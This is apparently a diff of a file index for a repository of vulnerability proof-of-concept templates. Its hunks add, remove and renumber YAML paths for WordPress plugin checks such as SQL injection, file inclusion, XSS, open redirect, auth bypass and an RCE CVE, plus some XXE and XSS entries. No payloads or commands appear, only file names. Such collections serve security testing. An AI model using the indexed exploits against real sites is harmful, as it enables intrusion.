./poc/wordpress/wordpress-affiliatewp-log.yaml
@@ -99108,6 +99100,7 @@
./poc/wordpress/wordpress-bbe7d5752179155e1a73c493a9edc901.yaml
./poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml
./poc/wordpress/wordpress-bbpress-plugin-listing-11246.yaml
+./poc/wordpress/wordpress-bbpress-plugin-listing.yaml
./poc/wordpress/wordpress-bc11188030c5ef34e44564c173b85b3b.yaml
./poc/wordpress/wordpress-bcae5ef6c0a4aa3c431c36626afbf967.yaml
./poc/wordpress/wordpress-bcee80614ad35036078b4b38fac65ba7.yaml
@@ -99191,6 +99184,7 @@
./poc/wordpress/wordpress-db-backup-listing-11250.yaml
./poc/wordpress/wordpress-db-backup-listing.yaml
./poc/wordpress/wordpress-db-backup.yaml
+./poc/wordpress/wordpress-db-repair-11252.yaml
./poc/wordpress/wordpress-db-repair-11253.yaml
./poc/wordpress/wordpress-db-repair-11254.yaml
./poc/wordpress/wordpress-db-repair-11255.yaml
@@ -99202,9 +99196,9 @@
./poc/wordpress/wordpress-de03b87f4ceb36bcd460178f68d510a8.yaml
./poc/wordpress/wordpress-debug-log-11256.yaml
./poc/wordpress/wordpress-debug-log-11257.yaml
-./poc/wordpress/wordpress-debug-log-11258.yaml
+./poc/wordpress/wordpress-debug-log-11259.yaml
./poc/wordpress/wordpress-debug-log.yaml
-./poc/wordpress/wordpress-detect-11261.yaml
+./poc/wordpress/wordpress-detect-11260.yaml
./poc/wordpress/wordpress-detect.yaml
./poc/wordpress/wordpress-detect2.yaml
./poc/wordpress/wordpress-directory-listing-1.yaml
@@ -99257,9 +99251,9 @@
./poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml
./poc/wordpress/wordpress-emails-verification-for-woocommerce-2.yaml
./poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml
-./poc/wordpress/wordpress-emergency-script-11272.yaml
./poc/wordpress/wordpress-emergency-script-11273.yaml
./poc/wordpress/wordpress-emergency-script-11274.yaml
+./poc/wordpress/wordpress-emergency-script-11275.yaml
./poc/wordpress/wordpress-emergency-script-11276.yaml
./poc/wordpress/wordpress-emergency-script-11277.yaml
./poc/wordpress/wordpress-emergency-script.yaml
@@ -99326,15 +99320,12 @@
./poc/wordpress/wordpress-gdpr-7c5c53c8eaf2ec27b04a769490da718e.yaml
./poc/wordpress/wordpress-gdpr.yaml
./poc/wordpress/wordpress-git-config-1.yaml
-./poc/wordpress/wordpress-git-config-11278.yaml
./poc/wordpress/wordpress-git-config-11279.yaml
./poc/wordpress/wordpress-git-config-2.yaml
-./poc/wordpress/wordpress-gotmls-detect-11280.yaml
./poc/wordpress/wordpress-gotmls-detect-11281.yaml
./poc/wordpress/wordpress-gotmls-detect.yaml
+./poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml
./poc/wordpress/wordpress-gtranslate-plugin-listing-11283.yaml
-./poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml
-./poc/wordpress/wordpress-gtranslate-plugin-listing.yaml
./poc/wordpress/wordpress-https-4a61ef799fd66b2a49253a5892d07d5e.yaml
./poc/wordpress/wordpress-https-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wordpress-https-fc212cc7eec653319494b488cc7fe53d.yaml
@@ -99345,19 +99336,17 @@
./poc/wordpress/wordpress-infinitewp-auth-bypass-11285.yaml
./poc/wordpress/wordpress-infinitewp-auth-bypass-11286.yaml
./poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml
-./poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml
./poc/wordpress/wordpress-infinitewp-auth-bypass-11289.yaml
./poc/wordpress/wordpress-infinitewp-auth-bypass.yaml
./poc/wordpress/wordpress-instagram-feed-c6f7df5b11c5d64e4d637b8f3456595f.yaml
./poc/wordpress/wordpress-instagram-feed.yaml
./poc/wordpress/wordpress-install.yaml
-./poc/wordpress/wordpress-installer-log-11290.yaml
./poc/wordpress/wordpress-installer-log-11291.yaml
+./poc/wordpress/wordpress-installer-log-11292.yaml
./poc/wordpress/wordpress-installer-log.yaml
./poc/wordpress/wordpress-js.yaml
./poc/wordpress/wordpress-language-7a04dfac5ff879ee9a27e2783540d3cb.yaml
./poc/wordpress/wordpress-language.yaml
-./poc/wordpress/wordpress-lfi.yaml
./poc/wordpress/wordpress-login-11293.yaml
./poc/wordpress/wordpress-login-11294.yaml
./poc/wordpress/wordpress-login.yaml
@@ -99421,9 +99410,8 @@
./poc/wordpress/wordpress-rdf-user-enum-11305.yaml
./poc/wordpress/wordpress-rdf-user-enum.yaml
./poc/wordpress/wordpress-readme-file.yaml
-./poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml
./poc/wordpress/wordpress-redirection-plugin-listing-11307.yaml
-./poc/wordpress/wordpress-redirection-plugin-listing.yaml
+./poc/wordpress/wordpress-redirection-plugin-listing-11308.yaml
./poc/wordpress/wordpress-registration-enabled.yaml
./poc/wordpress/wordpress-rest-api.yaml
./poc/wordpress/wordpress-sensitive-config.yaml
@@ -99495,11 +99483,12 @@
./poc/wordpress/wordpress-tabs-slides.yaml
./poc/wordpress/wordpress-takeover-11310.yaml
./poc/wordpress/wordpress-takeover-11311.yaml
-./poc/wordpress/wordpress-takeover-11313.yaml
+./poc/wordpress/wordpress-takeover-11312.yaml
./poc/wordpress/wordpress-takeover-11314.yaml
./poc/wordpress/wordpress-takeover.yaml
./poc/wordpress/wordpress-theme-travelscape-1-0-3-arbitrary-file-upload.yaml
./poc/wordpress/wordpress-themes-detect-11315.yaml
+./poc/wordpress/wordpress-themes-detect-11316.yaml
./poc/wordpress/wordpress-themes-detect.yaml
./poc/wordpress/wordpress-themes2.yaml
./poc/wordpress/wordpress-tmm-db-migrate-11318.yaml
@@ -99512,8 +99501,8 @@
./poc/wordpress/wordpress-tooltips-bb1c0eb45ddcceab250cf6c792889f44.yaml
./poc/wordpress/wordpress-tooltips-fa55ee3725a206bca8373dd20c9f75b0.yaml
./poc/wordpress/wordpress-tooltips.yaml
-./poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml
./poc/wordpress/wordpress-total-upkeep-backup-download-11323.yaml
+./poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml
./poc/wordpress/wordpress-total-upkeep-backup-download.yaml
./poc/wordpress/wordpress-twitterbot-d36dd4bc6c1a3d5b4f0aafd5b7b723c5.yaml
./poc/wordpress/wordpress-twitterbot.yaml
@@ -99534,61 +99523,58 @@
./poc/wordpress/wordpress-users.yaml
./poc/wordpress/wordpress-weak-credentials-11334.yaml
./poc/wordpress/wordpress-weak-credentials-11335.yaml
-./poc/wordpress/wordpress-weak-credentials-11337.yaml
+./poc/wordpress/wordpress-weak-credentials-11336.yaml
./poc/wordpress/wordpress-weak-credentials.yaml
./poc/wordpress/wordpress-website-detect.yaml
./poc/wordpress/wordpress-whois-search-15d0f2f1bcb62f9575544a5207b1af33.yaml
./poc/wordpress/wordpress-whois-search-1f912223cd5db03abd6e32e02ba54028.yaml
./poc/wordpress/wordpress-whois-search.yaml
./poc/wordpress/wordpress-woocommerce-listing-11338.yaml
-./poc/wordpress/wordpress-woocommerce-listing-11339.yaml
./poc/wordpress/wordpress-woocommerce-listing-11340.yaml
+./poc/wordpress/wordpress-woocommerce-listing-11341.yaml
./poc/wordpress/wordpress-woocommerce-sqli-1.yaml
./poc/wordpress/wordpress-woocommerce-sqli-11342.yaml
./poc/wordpress/wordpress-woocommerce-sqli-11343.yaml
./poc/wordpress/wordpress-woocommerce-sqli-11344.yaml
-./poc/wordpress/wordpress-woocommerce-sqli-11345.yaml
./poc/wordpress/wordpress-woocommerce-sqli-2.yaml
./poc/wordpress/wordpress-woocommerce-sqli.yaml
-./poc/wordpress/wordpress-woosidebars.yaml
+./poc/wordpress/wordpress-wordfence-lfi-11346.yaml
./poc/wordpress/wordpress-wordfence-lfi-11347.yaml
./poc/wordpress/wordpress-wordfence-lfi-11348.yaml
./poc/wordpress/wordpress-wordfence-lfi-11349.yaml
-./poc/wordpress/wordpress-wordfence-lfi-11350.yaml
./poc/wordpress/wordpress-wordfence-lfi-11351.yaml
./poc/wordpress/wordpress-wordfence-lfi-11352.yaml
./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml
./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml
./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11355.yaml
-./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml
./poc/wordpress/wordpress-wordfence-xss-11357.yaml
./poc/wordpress/wordpress-wordfence-xss-11358.yaml
./poc/wordpress/wordpress-wordfence-xss-11359.yaml
./poc/wordpress/wordpress-wordfence-xss-11361.yaml
./poc/wordpress/wordpress-wordfence-xss-11362.yaml
./poc/wordpress/wordpress-wordfence-xss.yaml
-./poc/wordpress/wordpress-workflow-11363.yaml
./poc/wordpress/wordpress-workflow-11364.yaml
+./poc/wordpress/wordpress-workflow-11365.yaml
./poc/wordpress/wordpress-workflow-11366.yaml
./poc/wordpress/wordpress-workflow.yaml
./poc/wordpress/wordpress-wp-config-exposure.yml
./poc/wordpress/wordpress-wpconfig-inclosure.yaml
./poc/wordpress/wordpress-wpcourses-info-disclosure-11367.yaml
./poc/wordpress/wordpress-wpcourses-info-disclosure-11368.yaml
+./poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml
./poc/wordpress/wordpress-wpcourses-info-disclosure-11370.yaml
-./poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml
./poc/wordpress/wordpress-wpcourses-info-disclosure.yaml
./poc/wordpress/wordpress-xmlrpc-brute-force.yaml
./poc/wordpress/wordpress-xmlrpc-bruteforce.yaml
./poc/wordpress/wordpress-xmlrpc-enabled.yaml
-./poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml
./poc/wordpress/wordpress-xmlrpc-listmethods-11373.yaml
-./poc/wordpress/wordpress-xmlrpc-listmethods.yaml
+./poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml
./poc/wordpress/wordpress-zebra-form-xss-11375.yaml
./poc/wordpress/wordpress-zebra-form-xss-11376.yaml
./poc/wordpress/wordpress-zebra-form-xss-11377.yaml
-./poc/wordpress/wordpress-zebra-form-xss-11378.yaml
+./poc/wordpress/wordpress-zebra-form-xss-11379.yaml
./poc/wordpress/wordpress-zebra-form-xss.yaml
+./poc/wordpress/wordpress.yaml
./poc/wordpress/wordpressConfig.yaml
./poc/wordpress/wordpress_SSRF_Qards (1).yaml
./poc/wordpress/wordpress_bricks_builder_rce_cve_2024_25600.yaml
@@ -99779,6 +99765,7 @@
./poc/wordpress/wp-amasin-the-amazon-affiliate-shop.yaml
./poc/wordpress/wp-amazon-shop-90e615477738db895ced16515c910b83.yaml
./poc/wordpress/wp-amazon-shop.yaml
+./poc/wordpress/wp-ambience-xss-11407.yaml
./poc/wordpress/wp-ambience-xss-11409.yaml
./poc/wordpress/wp-ambience-xss-11410.yaml
./poc/wordpress/wp-ambience-xss.yaml
@@ -99826,6 +99813,7 @@
./poc/wordpress/wp-appointment-schedule-booking-system.yaml
./poc/wordpress/wp-appointments-schedules-18c89d6aa69e1599fc784ae097e34287.yaml
./poc/wordpress/wp-appointments-schedules.yaml
+./poc/wordpress/wp-arforms-listing-11415.yaml
./poc/wordpress/wp-arforms-listing-11416.yaml
./poc/wordpress/wp-arforms-listing-11417.yaml
./poc/wordpress/wp-arforms-listing-11418.yaml
@@ -100141,8 +100129,8 @@
./poc/wordpress/wp-code-highlightjs-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wp-code-highlightjs-plugin.yaml
./poc/wordpress/wp-code-highlightjs.yaml
-./poc/wordpress/wp-code-snippets-xss-11425.yaml
./poc/wordpress/wp-code-snippets-xss-11426.yaml
+./poc/wordpress/wp-code-snippets-xss.yaml
./poc/wordpress/wp-codemirror-block-00c8945b2d90aba47cb8e8cc192bdf4e.yaml
./poc/wordpress/wp-codemirror-block.yaml
./poc/wordpress/wp-coder-132985a8b76990e0c6cd6695eb596f6c.yaml
@@ -100343,7 +100331,7 @@
./poc/wordpress/wp-custom-post-template.yaml
./poc/wordpress/wp-custom-tables-xss-11431.yaml
./poc/wordpress/wp-custom-tables-xss-11432.yaml
-./poc/wordpress/wp-custom-tables-xss-11434.yaml
+./poc/wordpress/wp-custom-tables-xss-11433.yaml
./poc/wordpress/wp-custom-tables-xss-11435.yaml
./poc/wordpress/wp-custom-tables-xss.yaml
./poc/wordpress/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml
@@ -100692,7 +100680,6 @@
./poc/wordpress/wp-email-subscribers-listing-11440.yaml
./poc/wordpress/wp-email-subscribers-listing-11441.yaml
./poc/wordpress/wp-email-subscribers-listing-11443.yaml
-./poc/wordpress/wp-email-subscribers-listing.yaml
./poc/wordpress/wp-email-template-1729a8753eae476fa81f29fbf915eae7.yaml
./poc/wordpress/wp-email-template-77ad67534972b8073fe68dc3e6a0ae34.yaml
./poc/wordpress/wp-email-template-9ceea61553b1440c884786aa4c073642.yaml
@@ -100969,7 +100956,6 @@
./poc/wordpress/wp-filemanager.yaml
./poc/wordpress/wp-film-studio-49f13dc6fa66760ca1ff6d5f40c3291d.yaml
./poc/wordpress/wp-film-studio.yaml
-./poc/wordpress/wp-finder-xss-11445.yaml
./poc/wordpress/wp-finder-xss-11447.yaml
./poc/wordpress/wp-finder-xss-11448.yaml
./poc/wordpress/wp-finder-xss-11449.yaml
@@ -101007,6 +100993,7 @@
./poc/wordpress/wp-footnotes.yaml
./poc/wordpress/wp-force-ssl-535af98dd21b180aed9353b26ab61bf4.yaml
./poc/wordpress/wp-force-ssl-8016151e9aade43a962c06ab9c46dfaf.yaml
+./poc/wordpress/wp-force-ssl.yaml
./poc/wordpress/wp-forecast-8095a25d926aef6f4d242637d15ae9bf.yaml
./poc/wordpress/wp-forecast-bbfafd2718458509e63452a3085f34b5.yaml
./poc/wordpress/wp-forecast.yaml
@@ -101052,8 +101039,8 @@
./poc/wordpress/wp-front-end-repository.yaml
./poc/wordpress/wp-full-auto-tags-manager-4c934eda242d0419e3e635b91ae55277.yaml
./poc/wordpress/wp-full-auto-tags-manager.yaml
+./poc/wordpress/wp-full-path-disclosure-11455.yaml
./poc/wordpress/wp-full-path-disclosure-11456.yaml
-./poc/wordpress/wp-full-path-disclosure-11457.yaml
./poc/wordpress/wp-full-path-disclosure.yaml
./poc/wordpress/wp-full-stripe-free-080a5561255af98399eb27da1263ccaf.yaml
./poc/wordpress/wp-full-stripe-free-880466ddc7fd0af03d20a07473dd287e.yaml
@@ -101200,14 +101187,14 @@
./poc/wordpress/wp-gravity-forms-spreadsheets-ce51e508f7b3ae4fa3cfc0e4f02b85ff.yaml
./poc/wordpress/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml
./poc/wordpress/wp-gravity-forms-spreadsheets.yaml
+./poc/wordpress/wp-grimag-open-redirect-11458.yaml
./poc/wordpress/wp-grimag-open-redirect-11459.yaml
./poc/wordpress/wp-grimag-open-redirect-11460.yaml
./poc/wordpress/wp-grimag-open-redirect-11461.yaml
./poc/wordpress/wp-grimag-open-redirect-11462.yaml
+./poc/wordpress/wp-gtranslate-open-redirect-11463.yaml
./poc/wordpress/wp-gtranslate-open-redirect-11464.yaml
-./poc/wordpress/wp-gtranslate-open-redirect-11465.yaml
./poc/wordpress/wp-gtranslate-open-redirect-11466.yaml
-./poc/wordpress/wp-gtranslate-open-redirect.yaml
./poc/wordpress/wp-guestmap-138b91374da611e5609255da3727b885.yaml
./poc/wordpress/wp-guestmap.yaml
./poc/wordpress/wp-guppy-c55927dc6402e6af39078d4c3378b5b6.yaml
@@ -101360,9 +101347,10 @@
./poc/wordpress/wp-insert.yaml
./poc/wordpress/wp-instagram-bank-a759e03a3140ab5da9f810ffbdb3a4c2.yaml
./poc/wordpress/wp-instagram-bank.yaml
+./poc/wordpress/wp-install-11473.yaml
./poc/wordpress/wp-install-11474.yaml
-./poc/wordpress/wp-install-11475.yaml
./poc/wordpress/wp-install-php.yaml
+./poc/wordpress/wp-install.yaml
./poc/wordpress/wp-instance-rename-f54408534e740536e4255c5420540815.yaml
./poc/wordpress/wp-instance-rename.yaml
./poc/wordpress/wp-insurance-d6bda609865d6ab618b4f735cbea39bb.yaml
@@ -101395,7 +101383,7 @@
./poc/wordpress/wp-iwp-client-listing-11479.yaml
./poc/wordpress/wp-javospot-lfi-11480.yaml
./poc/wordpress/wp-javospot-lfi-11481.yaml
-./poc/wordpress/wp-javospot-lfi.yaml
+./poc/wordpress/wp-javospot-lfi-11482.yaml
./poc/wordpress/wp-javospot-premium-theme-lfi.yaml
./poc/wordpress/wp-jitsi-shortcodes-7170b6ccdadf79ce812cf8db156d523a.yaml
./poc/wordpress/wp-jitsi-shortcodes-ae288d2fafe96b20fe651a633ad8ef11.yaml
@@ -101501,7 +101489,7 @@
./poc/wordpress/wp-knews-xss-11484.yaml
./poc/wordpress/wp-knews-xss-11485.yaml
./poc/wordpress/wp-knews-xss-11486.yaml
-./poc/wordpress/wp-knews-xss-11487.yaml
+./poc/wordpress/wp-knews-xss-11488.yaml
./poc/wordpress/wp-knews-xss.yaml
./poc/wordpress/wp-knowledgebase-ce12311920213990a4e4a36be60be911.yaml
./poc/wordpress/wp-knowledgebase.yaml
@@ -101806,6 +101794,7 @@
./poc/wordpress/wp-memory-plugin.yaml
./poc/wordpress/wp-memory.yaml
./poc/wordpress/wp-memphis-documents-library-lfi-1.yaml
+./poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml
./poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml
./poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml
./poc/wordpress/wp-memphis-documents-library-lfi-11498.yaml
@@ -101917,6 +101906,7 @@
./poc/wordpress/wp-mpdf-2c78393e91f992fef96c27f7c515219b.yaml
./poc/wordpress/wp-mpdf-95b1d86b0d9172f70e27dd5cdd6025a1.yaml
./poc/wordpress/wp-mpdf.yaml
+./poc/wordpress/wp-mstore-plugin-listing-11500.yaml
./poc/wordpress/wp-mstore-plugin-listing-11501.yaml
./poc/wordpress/wp-mui-mass-user-input-a8af40a859ef12017793ca809201c2d2.yaml
./poc/wordpress/wp-mui-mass-user-input-b32a81e6becbfc443d59541b147d668c.yaml
@@ -101932,6 +101922,7 @@
./poc/wordpress/wp-multiple-theme-ssrf-11510.yaml
./poc/wordpress/wp-multiple-theme-ssrf-11511.yaml
./poc/wordpress/wp-multiple-theme-ssrf-11512.yaml
+./poc/wordpress/wp-multiple-theme-ssrf-11513.yaml
./poc/wordpress/wp-multisite-content-copier-02469035e949992a5abfd04fc61ddbad.yaml
./poc/wordpress/wp-multisite-content-copier-9f591f88f9aee0030295b5c3d28f9149.yaml
./poc/wordpress/wp-multisite-content-copier-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -102116,7 +102107,6 @@
./poc/wordpress/wp-photo-text-slider-50.yaml
./poc/wordpress/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml
./poc/wordpress/wp-php-widget.yaml
-./poc/wordpress/wp-phpfreechat-xss-11524.yaml
./poc/wordpress/wp-phpfreechat-xss-11526.yaml
./poc/wordpress/wp-phpfreechat-xss-11527.yaml
./poc/wordpress/wp-phpfreechat-xss-11528.yaml
@@ -102160,9 +102150,10 @@
./poc/wordpress/wp-plotly-75c21e80d525814876b411270547e062.yaml
./poc/wordpress/wp-plotly.yaml
./poc/wordpress/wp-plugin-1-flashgallery-listing-1.yaml
-./poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml
+./poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml
./poc/wordpress/wp-plugin-1-flashgallery-listing-11532.yaml
./poc/wordpress/wp-plugin-1-flashgallery-listing-2.yaml
+./poc/wordpress/wp-plugin-1-flashgallery-listing.yaml
./poc/wordpress/wp-plugin-ad-widget-lfi.yaml
./poc/wordpress/wp-plugin-canto-ssrf.yaml
./poc/wordpress/wp-plugin-info-card-2c6bf7db3c2496dc0c84092a58ea166f.yaml
@@ -102186,7 +102177,7 @@
./poc/wordpress/wp-plugin-utlimate-member-11539.yaml
./poc/wordpress/wp-plugin-utlimate-member-11540.yaml
./poc/wordpress/wp-plugin-utlimate-member-11541.yaml
-./poc/wordpress/wp-plugin-utlimate-member.yaml
+./poc/wordpress/wp-plugin-utlimate-member-11542.yaml
./poc/wordpress/wp-plugin-wp-with-spritz-lfi.yaml
./poc/wordpress/wp-plugins.yaml
./poc/wordpress/wp-pocket-urls-254217ba23bf67e5ab1f8ee2edeef109.yaml
@@ -102213,9 +102204,9 @@
./poc/wordpress/wp-popup-builder-0c09eb9779aee8d5af8e26f717d75189.yaml
./poc/wordpress/wp-popup-builder-a5f68b9d82c37b214641a19757438e98.yaml
./poc/wordpress/wp-popup-builder.yaml
+./poc/wordpress/wp-popup-listing-11543.yaml
./poc/wordpress/wp-popup-listing-11544.yaml
./poc/wordpress/wp-popup-listing-11545.yaml
-./poc/wordpress/wp-popup-listing.yaml
./poc/wordpress/wp-popups-lite-397d56c4826cb39d4978e607d024b3f6.yaml
./poc/wordpress/wp-popups-lite-482e13507074a152afd1c369afb2758f.yaml
./poc/wordpress/wp-popups-lite-69ef67ee7aec095c81a6e3175b553ce1.yaml
@@ -102369,14 +102360,14 @@
./poc/wordpress/wp-property-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wp-property-plugin.yaml
./poc/wordpress/wp-property.yaml
-./poc/wordpress/wp-prostore-open-redirect-11546.yaml
./poc/wordpress/wp-prostore-open-redirect-11547.yaml
./poc/wordpress/wp-prostore-open-redirect-11548.yaml
./poc/wordpress/wp-prostore-open-redirect-11549.yaml
+./poc/wordpress/wp-prostore-open-redirect-11550.yaml
./poc/wordpress/wp-publications-b85a3c11767227494a836174e6262f5c.yaml
./poc/wordpress/wp-publications.yaml
./poc/wordpress/wp-qards-listing-11551.yaml
-./poc/wordpress/wp-qards-listing-11552.yaml
+./poc/wordpress/wp-qards-listing.yaml
./poc/wordpress/wp-qrcode-me-v-card-314ed947e5aebc74cf601ba290f4edad.yaml
./poc/wordpress/wp-qrcode-me-v-card.yaml
./poc/wordpress/wp-quick-front-end-editor-02de13f83ec39d9f9fa219b2764f4023.yaml
@@ -102541,6 +102532,7 @@
./poc/wordpress/wp-reviews-plugin-for-google-ef8cb6fc353aaae2bbe90dfc74187793.yaml
./poc/wordpress/wp-reviews-plugin-for-google.yaml
./poc/wordpress/wp-revslider-file-download-11553.yaml
+./poc/wordpress/wp-revslider-file-download-11554.yaml
./poc/wordpress/wp-revslider-file-download-11555.yaml
./poc/wordpress/wp-revslider-file-download.yaml
./poc/wordpress/wp-roadmap-7e3122605112af28a9af70aa035a1854.yaml
@@ -102618,9 +102610,9 @@
./poc/wordpress/wp-search-filter.yaml
./poc/wordpress/wp-search-keyword-redirect-bf4ef59a087b3009bcd665ccc0df58a8.yaml
./poc/wordpress/wp-search-keyword-redirect.yaml
+./poc/wordpress/wp-securimage-xss-11556.yaml
./poc/wordpress/wp-securimage-xss-11558.yaml
./poc/wordpress/wp-securimage-xss-11559.yaml
-./poc/wordpress/wp-securimage-xss-11560.yaml
./poc/wordpress/wp-securimage-xss.yaml
./poc/wordpress/wp-security-audit-log-00ed417b21dd63bdfa86736dcf1b985f.yaml
./poc/wordpress/wp-security-audit-log-069819bcca9f4c9d5cccbe176453ccc4.yaml
@@ -102701,8 +102693,8 @@
./poc/wordpress/wp-setup-config.yaml
./poc/wordpress/wp-setup-wizard-8c031e05af523e07598a9fec815c857a.yaml
./poc/wordpress/wp-setup-wizard.yaml
-./poc/wordpress/wp-sfwd-lms-listing-11562.yaml
./poc/wordpress/wp-sfwd-lms-listing-11563.yaml
+./poc/wordpress/wp-sfwd-lms-listing-11564.yaml
./poc/wordpress/wp-sfwd-lms-listing-11565.yaml
./poc/wordpress/wp-shamsi-124603a63a010e84e51504af813f16d0.yaml
./poc/wordpress/wp-shamsi-d80212b26727fff04d47601179cd407f.yaml
@@ -102752,7 +102744,6 @@
./poc/wordpress/wp-simple-fields-lfi-11566.yaml
./poc/wordpress/wp-simple-fields-lfi-11567.yaml
./poc/wordpress/wp-simple-fields-lfi-11568.yaml
-./poc/wordpress/wp-simple-fields-lfi-11569.yaml
./poc/wordpress/wp-simple-fields-lfi-11570.yaml
./poc/wordpress/wp-simple-fields-lfi-11571.yaml
./poc/wordpress/wp-simple-firewall-3ae2ab7cde1e76100e523aaf928ed76a.yaml
@@ -102799,8 +102790,8 @@
./poc/wordpress/wp-sitemap-page.yaml
./poc/wordpress/wp-slick-slider-and-image-carousel-7851c267c5129958224bd7b0d064e1e0.yaml
./poc/wordpress/wp-slick-slider-and-image-carousel.yaml
-./poc/wordpress/wp-slideshow-xss-11572.yaml
./poc/wordpress/wp-slideshow-xss-11573.yaml
+./poc/wordpress/wp-slideshow-xss-11574.yaml
./poc/wordpress/wp-slideshow-xss-11575.yaml
./poc/wordpress/wp-slideshow-xss-11576.yaml
./poc/wordpress/wp-slideshow-xss.yaml
@@ -103348,8 +103339,8 @@
./poc/wordpress/wp-tutor-lfi-11597.yaml
./poc/wordpress/wp-tutor-lfi-11598.yaml
./poc/wordpress/wp-tutor-lfi-11599.yaml
-./poc/wordpress/wp-tutor-lfi-11600.yaml
./poc/wordpress/wp-tutor-lfi-11601.yaml
+./poc/wordpress/wp-tutor-lfi.yaml
./poc/wordpress/wp-twilio-core-57a9edaed661bdb0228f355d7457cb63.yaml
./poc/wordpress/wp-twilio-core-6477bf18cad6c823db485408d49b337b.yaml
./poc/wordpress/wp-twilio-core.yaml
@@ -103554,6 +103545,7 @@
./poc/wordpress/wp-vault-lfi-11610.yaml
./poc/wordpress/wp-vault-lfi-11611.yaml
./poc/wordpress/wp-vault-lfi-11612.yaml
+./poc/wordpress/wp-vault-local-file-inclusion.yaml
./poc/wordpress/wp-vault-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wp-vault-plugin.yaml
./poc/wordpress/wp-vault.yaml
@@ -103624,6 +103616,7 @@
./poc/wordpress/wp-whatsapp-chat.yaml
./poc/wordpress/wp-whatsapp.yaml
./poc/wordpress/wp-whmcs-xss-11613.yaml
+./poc/wordpress/wp-whmcs-xss-11614.yaml
./poc/wordpress/wp-whmcs-xss.yaml
./poc/wordpress/wp-whois-domain-a87495e38de2f623ebcaa4729c800268.yaml
./poc/wordpress/wp-whois-domain.yaml
@@ -103643,8 +103636,8 @@
./poc/wordpress/wp-woocommerce-email-verification-11618.yaml
./poc/wordpress/wp-woocommerce-email-verification-11619.yaml
./poc/wordpress/wp-woocommerce-email-verification-2.yaml
+./poc/wordpress/wp-woocommerce-file-download-11620.yaml
./poc/wordpress/wp-woocommerce-file-download-11621.yaml
-./poc/wordpress/wp-woocommerce-file-download.yaml
./poc/wordpress/wp-woocommerce-pdf-invoice-listing-11622.yaml
./poc/wordpress/wp-woocommerce-quickbooks-24e0b26c242968cb290b2a8bf1d68029.yaml
./poc/wordpress/wp-woocommerce-quickbooks-95df688c610b5a94c1c10c8d8b9ac0d6.yaml
@@ -103944,8 +103937,8 @@
./poc/wordpress/wpdiscuz-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wpdiscuz-plugin.yaml
./poc/wordpress/wpdiscuz.yaml
+./poc/wordpress/wpdm-cache-session-11436.yaml
./poc/wordpress/wpdm-cache-session-11437.yaml
-./poc/wordpress/wpdm-cache-session-11438.yaml
./poc/wordpress/wpdm-cache-session-11439.yaml
./poc/wordpress/wpdm-cache-session.yaml
./poc/wordpress/wpdm-gutenberg-blocks-055c2a59f216ef473b493c568e05a010.yaml
@@ -103962,7 +103955,6 @@
./poc/wordpress/wpe-indoshipping.yaml
./poc/wordpress/wpematico-ec832e52a1347479f81a04d23ebf54b8.yaml
./poc/wordpress/wpematico.yaml
-./poc/wordpress/wpengine-config-check.yaml
./poc/wordpress/wpeprivate-config-disclosure.yaml
./poc/wordpress/wpeprivate_leak.yaml
./poc/wordpress/wpforms-12c717c4e562d85a3a1cb61be261222c.yaml
@@ -104413,6 +104405,7 @@
./poc/wordpress/wptouch-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wptouch-e99bc150ef15024383b8cf0e64525f28.yaml
./poc/wordpress/wptouch-fa8996e405ccfd1e139b071450a49a11.yaml
+./poc/wordpress/wptouch-open-redirect-11592.yaml
./poc/wordpress/wptouch-open-redirect-11593.yaml
./poc/wordpress/wptouch-open-redirect-11594.yaml
./poc/wordpress/wptouch-open-redirect-11595.yaml
@@ -104533,7 +104526,7 @@
./poc/xml_external_entity/springboot-actuators-jolokia-xxe-1.yaml
./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10428.yaml
./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10429.yaml
-./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml
+./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml
./poc/xml_external_entity/springboot-actuators-jolokia-xxe-10432.yaml
./poc/xml_external_entity/springboot-actuators-jolokia-xxe-2.yaml
./poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml
@@ -104585,9 +104578,7 @@
./poc/xss/acme-xss-29.yaml
./poc/xss/admin-ajax-xss.yaml
./poc/xss/aem-setpreferences-xss-189.yaml
-./poc/xss/aem-setpreferences-xss.yaml
-./poc/xss/aem-xss-childlist-selector-197.yaml
-./poc/xss/aem-xss-childlist-selector.yaml
+./poc/xss/aem-xss-childlist-selector-198.yaml
./poc/xss/aikcms_v2-xss.yaml
./poc/xss/akamai-arl-xss-247.yaml
